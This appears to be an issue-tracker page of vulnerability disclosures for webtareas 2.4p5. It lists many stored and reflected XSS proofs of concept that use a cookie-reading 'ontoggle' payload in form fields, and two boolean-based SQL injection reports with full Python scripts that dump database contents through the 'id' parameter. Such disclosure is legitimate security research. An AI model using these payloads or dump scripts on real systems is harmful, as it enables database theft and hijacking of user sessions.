webtareas's Introduction
webtareas's People
webtareas's Issues
Stored Cross Site Scripting Vulnerability Bypass filter on "Contacts" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Contacts" feature.
Proof of Concept
Step 1: Go to "/contacts/listcontacts.php?", click "Add" and insert payload "<details/open/ontoggle=alert(document.cookie)>
" in "Last Name" field.
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
SQL injection Vulnerability on "id" in phasesets.php in webtareas 2.4p5
Version: 2.4p5
Description
The id parameter appears to be vulnerable to SQL injection attacks.
Proof of Concept
Step 1: Go to "/administration/phasesets.php?mode=delete&id=1", add payload '+and+1=1' to id parameter and see response with status 200 OK
Step 2: Add payload '+and+1=2' to id parameter and see response with status 302 Found
Step 3: Identify SQLi boolean based vulnerability, then write script dump database
import requests, urllib.parse, string
# query = sys.argv[1]
#printable = string.printable
url = 'http://localhost:13340/administration/phasesets.php?mode=delete&id='
headers = {
'Cookie': 'webTareasSID=o75prl9v5q8pjflftgi321mipj'
}
def calclength(query):
target = query.split('+')[0]
lent = 0
for n in range(1, 100):
payload = "1+and+length((select+%s))=%d" % (target, n)
resp = requests.get(url + payload, headers=headers)
if 'test1' in resp.text:
lent = n
break
return lent
def dump(query):
global url, headers
lent = calclength(query)
print('lent = '+str(lent))
result = ''
for i in range(1, lent + 1):
for n in range(30, 123):
payload = "1+and+ASCII(substring((select+%s),%d,1))=%d" % (query, i, n)
resp = requests.get(url + payload, headers=headers)
#print(payload)
if 'test1' in resp.text:
c = chr(n)
print("Found: %s" % c)
result += c
break
return result
print(dump('@@version'))
Result:
Impact
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.
Stored Cross Site Scripting Vulnerability Bypass filter on "Clients" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Clients" feature.
Proof of Concept
Step 1: Go to "/clients/listclients.php?", click "Add" and insert payload "<details/open/ontoggle=alert(document.cookie)>
" in "Name" field.
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Calendar" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Calendar" feature.
Proof of Concept
Step 1: Go to "/calendar/viewcalendar.php?", click "Add" and insert payload "<details/open/ontoggle=alert(document.cookie)>
" in "Subject" field.
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
SQL injection Vulnerability on "id" in deleteapprovalstages.php in webtareas 2.4p5
Version: 2.4p5
Description
The id parameter appears to be vulnerable to SQL injection attacks.
Proof of Concept
Step 1: Go to "/approvals/deleteapprovalstages.php?id=1", add payload '+and+1=1' to id parameter and see response have return data
Step 2: Add payload '+and+1=2' to id parameter and see response have no return data
Step 3: Identify SQLi boolean based vulnerability, then write script dump database
import requests, urllib.parse, string
# query = sys.argv[1]
#printable = string.printable
url = 'http://localhost:13340/approvals/deleteapprovalstages.php?id='
headers = {
'Cookie': 'webTareasSID=o75prl9v5q8pjflftgi321mipj'
}
def calclength(query):
target = query.split('+')[0]
lent = 0
for n in range(1, 100):
payload = "1+and+length((select+%s))=%d" % (target, n)
resp = requests.get(url + payload, headers=headers)
if 'test' in resp.text:
lent = n
break
return lent
def dump(query):
global url, headers
lent = calclength(query)
print('lent = '+str(lent))
result = ''
for i in range(1, lent + 1):
for n in range(30, 123):
payload = "1+and+ASCII(substring((select+%s),%d,1))=%d" % (query, i, n)
resp = requests.get(url + payload, headers=headers)
#print(payload)
if 'test' in resp.text:
c = chr(n)
print("Found: %s" % c)
result += c
break
return result
print(dump('@@version'))
Result:
Impact
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.
Reflect Cross Site Scripting Vulnerability Bypass filter on "Search" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Search" feature.
Proof of Concept
Step 1: Go to "/general/search.php?searchtype=simple", click "Search" and insert payload "<details/open/ontoggle=alert(document.cookie)>
".
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Files" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Files" feature.
Proof of Concept
Step 1: Go to "/linkedcontent/listfiles.php?doc_type=0&id=0", click "Add" and insert payload "<details/open/ontoggle=alert(document.cookie)>
" in "Name" field.
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Meetings" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Meetings" feature.
Proof of Concept
Step 1: Go to "/meetings/listmeetings.php?", click "Add" and insert payload "<details/open/ontoggle=alert(document.cookie)>
" in "Name" field.
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Chat" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Chat" feature.
Proof of Concept
Step 1: Go to "Chat" feature, insert payload "<details/open/ontoggle=alert(document.cookie)>
" and click "Enter" in "Messages" field.
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Subfolders" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Subfolders" feature.
Proof of Concept
Step 1: Go to "/linkedcontent/listfiles.php?doc_type=0&id=1&borne16=0&borne16=0", click "Add" and insert payload "<details/open/ontoggle=alert(document.cookie)>
" in "Name" field.
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Forums" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in the "Forums" feature.
Proof of Concept
Step 1: Go to "/forums/editforum.php?", click "Add" and insert payload "<details/open/ontoggle=alert(document.cookie)>
" in "Name" field.
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Stored Cross Site Scripting Vulnerability Bypass filter on "Projects" feature in webtareas 2.4p5
Version: 2.4p5
Description
An authenticated malicious user can take advantage of a Stored XSS vulnerability in "Add projects" function in the "Projects" feature.
Proof of Concept
Step 1: Go to "/projects/listprojects.php?", click "Add" and insert payload "<details/open/ontoggle=alert(document.cookie)>
" in "Name" field.
Step 2: Alert XSS Message
Impact
If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user.
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.